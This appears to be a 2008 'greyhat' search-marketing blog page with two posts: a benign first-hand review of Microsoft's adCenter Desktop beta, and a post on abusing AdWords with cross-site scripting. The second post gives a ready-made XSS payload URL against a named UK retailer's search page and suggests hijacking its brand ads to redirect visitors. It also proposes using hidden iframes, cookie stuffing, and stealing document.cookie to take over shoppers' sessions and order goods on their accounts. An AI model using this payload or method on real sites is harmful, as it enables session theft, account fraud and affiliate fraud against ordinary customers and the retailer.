Mr. Greyhat | Adventures into the world of Search Marketing with Pay Per Click (PPC) and Search Engine Optimization (SEO)

adCenter Desktop Beta..

August 13th, 2008 admin

So, here i am playing with the adCenter desktop beta. I’ll chronical my experience:

1. I signed up and downloaded and installed without Administrator priviledges, I was told I would need them. I didn’t.

2. It’s downloading all the accounts now (45 accts), some of them are large but it’s moving quickly. The account download process is definitely faster than adwords editor at this point.

System requirements


Microsoft adCenter Desktop requires the following system configuration:

Component

Minimum requirement

Operating system

PC running a 32-bit version of Microsoft Windows 2000, Windows XP, or Windows Vista

  • Administrator permissions required
  • Microsoft adCenter Desktop does not run on 64-bit versions of Windows
  • Microsoft adCenter Desktop installs Microsoft .NET Framework 3.0 Redistributable Package

Processor

32-bit processor required; 64-bit processors are supported

Memory

1 GB of RAM

Hard-disk space

250  MB of available hard-disk space
Web broswer Microsoft Internet Explorer 6 or later

Internet connection

Dial-up or broadband Internet access required during installation and for subsequent exchanges of data with Microsoft adCenter online

Microsoft adCenter account

Microsoft adCenter user name and password required during installation and for subsequent exchanges of data with Microsoft adCenter online

 

… only keywords left to download now..

 Thoughts so far- a more relevant progress bar would be really good. Something that shows numbers or actual percentages. A brief look at the api makes me think this would be very possible.

 

Ok, i’ve got it.

 

This is actually very nice. Grouping related accounts into sub accounts in a tree. Ad text is easy to change. It seems to crash extremely easily, unfortunately. Themenu system is very 2007officey, and it’s nice and clean. I’ve made a text ad change, and it uploaded very easily.  Adding a keyword is very easy although I’m not a huge fan of having to click ’save’ after every change. In adwords, a change is just saved in the interface.

 

Grabbing stats is  fairly slow, and you can only use preset periods of time.  Infact - I couldn’t get any stats at all. I think it’s likely that it is grabbing stats for all of the 50 or so accounts I have listed. This is fairly inefficient, and it should grab stats on the fly..

 

Currently there is no reporting tab, as there isn’t one in AdWords. It’s clearly based directly on adwords editor.

 

 

 

 

Posted in general ramblings | No Comments »

XSS, Adwords, affiliates.

August 6th, 2008 admin

It’s fairly clear that the majority of people know about blackhat ppc affiliate techniques. But how can you take these a step further, were you so inclined..

The nature of this method lies in marrying two technologies together. The problem with XSS exploits is the lack of targeted visitors via your link. Current methods include sending high volumes of spam e-mail with an apparently valid link. They marry phishing with XSS. Then when someone bites, you clone their session. There are inherent flaws with this method.

Adwords allows you to direct cheap targeted traffic for a brand site, that you have discovered an xss exploit in. Lets take; for example - Viking Direct. A huge company and affiliate program.

You could hijack their brand ad with the following destination url:

http://www.viking-direct.co.uk/catalog/search.do?Ntt=%3Cscript%3Ewindow.location%3D%22http%3A%2F%2Fwww.yourdestinationurl.co.uk%22%3B%3C/script%3E&No=0&N=6&Ntk=all%7Call&Ntx=mode+matchpartialmax&Nty=1

What is the benefit? You can gain an appearance of authenticity, their brand ad is already domain directed. You could insert your own affiliate redirect. You could change the script and insert an invisible iframe to load whatever you wished. For example - Stuff cookies, lots of them.

Or grab a document.cookie - and log into someone elses sessions. Make orders on their account, buy yourself a tv. That sort of bad stuff.

Using adwords and XSS together is not currently being exploited probably because there is some vital knowledge that is required to pull this off. But let me tell you, it’s extremely easy. I could have fished hundreds of session ids this morning from Viking Direct were I so inclined and go get myself those fifty 60″ tvs that my house just really needs.

Childs play..

Posted in general ramblings | No Comments »

  • Recent Posts

    • C# Project Euler
    • Quality Score about to change.
    • adCenter Desktop Beta..
    • XSS, Adwords, affiliates.
    • Atlas vs. Google Conversion tracking, the percentage difference.

  • Further reading..

    • Insider’s View
    • Matt Cutts Blog
    • PPC Blog
    • PPC Discussions
    • Search Engine Land
    • SEO Blackhat
    • SEOptimize

  • Archives

    • September 2008
    • August 2008
    • July 2008
    • June 2008
    • April 2008
    • March 2008
    • February 2008
    • January 2008

  •  

    August 2008
    M T W T F S S
    « Jul   Sep »
     123
    45678910
    11121314151617
    18192021222324
    25262728293031

Mr. Greyhat | Adventures into the world of Search Marketing with Pay Per Click (PPC) and Search Engine Optimization (SEO) is proudly powered by WordPress | Bob